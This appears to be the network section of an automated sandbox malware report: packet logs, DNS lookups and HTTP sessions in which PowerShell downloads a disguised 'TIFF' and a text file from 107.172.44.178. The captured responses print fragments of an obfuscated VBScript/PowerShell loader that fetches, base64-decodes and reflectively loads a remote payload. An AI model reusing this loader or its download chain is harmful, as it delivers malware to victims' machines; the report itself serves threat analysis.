                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.474375010 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.474423885 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.475148916 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.475183964 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.475219011 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.475267887 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.475271940 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.475341082 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.475923061 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.475955963 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.476012945 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.476717949 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.476753950 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.476787090 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.476802111 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.477566004 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.477600098 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.477617979 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.477664948 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.477699041 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.477735996 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.478408098 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.478444099 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.478461027 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.478492022 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.478547096 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.479237080 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.479270935 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.479305983 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.479336977 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.480073929 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.480108976 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.480142117 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.480145931 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.480178118 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.480199099 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.482692957 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.482767105 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.482781887 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.482798100 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.482892036 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.483056068 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.483089924 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.483124018 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.483139992 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.483160019 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.483201981 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.483877897 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.483911991 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.484258890 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.484580994 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.484615088 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.484647989 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.484682083 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.484697104 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.484734058 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.485373974 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.485408068 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.485440969 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.485466003 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.486022949 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.486057043 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.486092091 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.486119986 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.486124992 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.486162901 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.486851931 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.486886978 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.486901045 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.487608910 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.487643003 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.487694979 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.488369942 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.488404036 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.488416910 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.488436937 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.489099026 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.489134073 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.489141941 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.489176035 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.489860058 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.491451979 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.491506100 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.492186069 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.492219925 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.492254972 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.492288113 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.492291927 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.492332935 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.496922016 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.508605003 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.509402037 CET4978180192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:10.511568069 CET804978146.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:15.774880886 CET4981780192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:15.780409098 CET804981746.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:15.780503035 CET4981780192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:15.780714035 CET4981780192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:15.780919075 CET4981780192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:15.788286924 CET804981746.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:15.788325071 CET804981746.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:15.788355112 CET804981746.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:15.788676023 CET804981746.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:15.788706064 CET804981746.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:17.020526886 CET804981746.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:17.024024010 CET4981780192.168.2.446.173.214.24
                                                                                                                                                                                                                            Nov 18, 2024 18:38:17.031472921 CET804981746.173.214.24192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:17.031596899 CET4981780192.168.2.446.173.214.24
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Nov 18, 2024 18:37:24.870785952 CET5267053192.168.2.41.1.1.1
                                                                                                                                                                                                                            Nov 18, 2024 18:37:24.908104897 CET53526701.1.1.1192.168.2.4
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.662674904 CET5896153192.168.2.41.1.1.1
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.958018064 CET53589611.1.1.1192.168.2.4
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Nov 18, 2024 18:37:24.870785952 CET192.168.2.41.1.1.10x69eStandard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.662674904 CET192.168.2.41.1.1.10xdf35Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Nov 18, 2024 18:37:24.908104897 CET1.1.1.1192.168.2.40x69eNo error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Nov 18, 2024 18:37:24.908104897 CET1.1.1.1192.168.2.40x69eNo error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 18, 2024 18:38:07.958018064 CET1.1.1.1192.168.2.40xdf35No error (0)prolinice.ga46.173.214.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            • 1017.filemail.com
                                                                                                                                                                                                                            • 107.172.44.178
                                                                                                                                                                                                                            • siwffuchsxpuu.net
                                                                                                                                                                                                                              • prolinice.ga
                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.449730107.172.44.178805592C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.081362963 CET332OUTGET /53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF HTTP/1.1
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                            Host: 107.172.44.178
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758707047 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Mon, 18 Nov 2024 17:37:18 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                            Last-Modified: Mon, 18 Nov 2024 01:46:22 GMT
                                                                                                                                                                                                                            ETag: "227fc-62726156f5f6d"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Content-Length: 141308
                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Content-Type: image/tiff
                                                                                                                                                                                                                            Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 65 00 6e 00 67 00 6f 00 6d 00 61 00 64 00 65 00 6c 00 61 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 63 00 6f 00 72 00 6e 00 6f 00 66 00 6f 00 6e 00 65 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 6d 00 6f 00 71 00 75 00 65 00 6e 00 63 00 6f 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 61 00 70 00 72 00 65 00 73 00 61 00 72 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 61 00 73 00 73 00 65 00 6e 00 74 00 69 00 6d 00 65 00 6e 00 74 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 61 00 73 00 73 00 65 00 6e 00 74 00 69 00 6d 00 65 00 6e 00 74 00 6f 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 63 00 6f 00 72 00 6e 00 6f 00 66 00 6f 00 6e 00 65 00 2c 00 20 00 6d 00 6f 00 71 00 75 00 65 00 6e 00 63 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 61 00 73 00 73 00 65 00 6e 00 74 00 69 00 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: Function engomadela(ByVal cornofone, ByVal moquenco, ByVal apresar) Dim assentimento assentimento = InStr(cornofone, moquenco) Do While assentimento > 0 cornofone = Left(cornofone, assentimento - 1) & apresar & Mid(cornofone, assentimento + Len(moquenco)) assentimento = InStr(assentimento + Len(apresar), cornofone, moquenco) Loop engomadela = cornofoneEnd Functionprivate function ReadStdIn(
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758750916 CET1236INData Raw: 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 77 00 68 00 69 00 6c 00 65 00 20 00 4e 00 6f 00 74 00 20 00 73 00 74 00 64 00 49 00 6e 00 2e 00 41 00 74 00 45 00 6e 00 64 00 4f 00 66 00 53 00 74 00 72 00 65 00 61 00 6d 00 0d 00 0a 00 20 00 20 00 20
                                                                                                                                                                                                                            Data Ascii: ) while Not stdIn.AtEndOfStream ReadStdIn = ReadStdIn & stdIn.ReadAll wendend functionIf Not f
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758764029 CET424INData Raw: 00 6d 00 70 00 6c 00 59 00 33 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a 00 53 00 4c 00 55 00 51 00 4d 00 44 00 51 00 67 00 55 00 33 00 6c 00 7a 00 64 00 47 00 56 00 74 00 4c 00 6b 00 35 00 6c 00 64 00 43 00 4b 00 58 00 4e 00 56 00 46
                                                                                                                                                                                                                            Data Ascii: mplY3KXNVFCRPJSLUQMDQgU3lzdGVtLk5ldCKXNVFCRPJSLUQMD5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9h
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758919954 CET1236INData Raw: 00 47 00 56 00 34 00 64 00 43 00 35 00 46 00 62 00 6d 00 4e 00 76 00 5a 00 47 00 6c 00 75 00 5a 00 31 00 30 00 36 00 4f 00 6c 00 56 00 55 00 52 00 6a 00 67 00 75 00 52 00 32 00 56 00 30 00 55 00 33 00 52 00 79 00 61 00 57 00 35 00 6e 00 4b 00 48
                                                                                                                                                                                                                            Data Ascii: GV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1" engordamento = engordam
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758932114 CET1236INData Raw: 00 67 00 63 00 32 00 56 00 5a 00 63 00 33 00 52 00 68 00 63 00 6e 00 52 00 47 00 62 00 47 00 46 00 6e 00 4c 00 6b 00 78 00 6c 00 62 00 6d 00 64 00 30 00 61 00 44 00 74 00 7a 00 5a 00 56 00 6c 00 69 00 59 00 58 00 4e 00 6c 00 4e 00 6a 00 52 00 4d
                                                                                                                                                                                                                            Data Ascii: gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllKXNVFCRPJSLUQMDbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2KXNVFCRPJSLUQMD
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.758944035 CET424INData Raw: 00 6e 00 67 00 6f 00 72 00 64 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 20 00 3d 00 20 00 65 00 6e 00 67 00 6f 00 72 00 64 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 20 00 26 00 20 00 22 00 73 00 6e 00 63 00 32 00 56 00 5a 00 59 00 6d 00 46 00 7a 00 5a
                                                                                                                                                                                                                            Data Ascii: ngordamento = engordamento & "snc2VZYmFzZTY0UmV2ZXJzZKXNVFCRPJSLUQMDWQpO3KXNVFCRPJSLUQMDNlWScrJ2xvYWRlZEKXNVFCRPJSLUQMDFz
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.759097099 CET1236INData Raw: 00 59 00 57 00 35 00 6b 00 51 00 6e 00 6c 00 30 00 5a 00 58 00 4d 00 70 00 4f 00 33 00 4e 00 6c 00 57 00 58 00 5a 00 68 00 61 00 55 00 31 00 6c 00 64 00 47 00 68 00 76 00 5a 00 43 00 41 00 39 00 49 00 46 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52
                                                                                                                                                                                                                            Data Ascii: YW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFKXNVFCRPJSLUQMDsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.759109974 CET1236INData Raw: 00 47 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a 00 53 00 4c 00 55 00 51 00 4d 00 44 00 39 00 51 00 64 00 55 00 6b 00 73 00 55 00 48 00 56 00 4a 00 5a 00 47 00 56 00 7a 00 59 00 58 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a
                                                                                                                                                                                                                            Data Ascii: GKXNVFCRPJSLUQMD9QdUksUHVJZGVzYXKXNVFCRPJSLUQMDRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycp
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.759120941 CET1236INData Raw: 00 52 00 50 00 4a 00 53 00 4c 00 55 00 51 00 4d 00 44 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 26 00 20 00 22
                                                                                                                                                                                                                            Data Ascii: RPJSLUQMD" enjugar = enjugar & "KXNVFCRPJSLUQMD" & engordamento & "'KXNVFCRPJSLUQMD" enjugar = enjugar
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.759394884 CET1236INData Raw: 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 26 00 20 00 22 00 64 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a 00 53
                                                                                                                                                                                                                            Data Ascii: enjugar = enjugar & "dKXNVFCRPJSLUQMDinKXNVFCRPJSLUQMD" enjugar = enjugar & "gKXNVFCRPJSLUQMD]:"
                                                                                                                                                                                                                            Nov 18, 2024 18:37:18.763900042 CET1236INData Raw: 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 26 00 20 00 22 00 6d 00 62 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52
                                                                                                                                                                                                                            Data Ascii: " enjugar = enjugar & "mbKXNVFCRPJSLUQMDas" enjugar = enjugar & "eKXNVFCRPJSLUQMD6" enjugar =


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.449738107.172.44.178805568C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.140311956 CET78OUTGET /53/WRFFRGT.txt HTTP/1.1
                                                                                                                                                                                                                            Host: 107.172.44.178
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823004007 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Mon, 18 Nov 2024 17:37:42 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                            Last-Modified: Mon, 18 Nov 2024 01:44:05 GMT
                                                                                                                                                                                                                            ETag: "c558-627260d4938d1"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Content-Length: 50520
                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                            Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                                                                                            Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823098898 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                            Nov 18, 2024 18:37:42.823112011 CET424INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
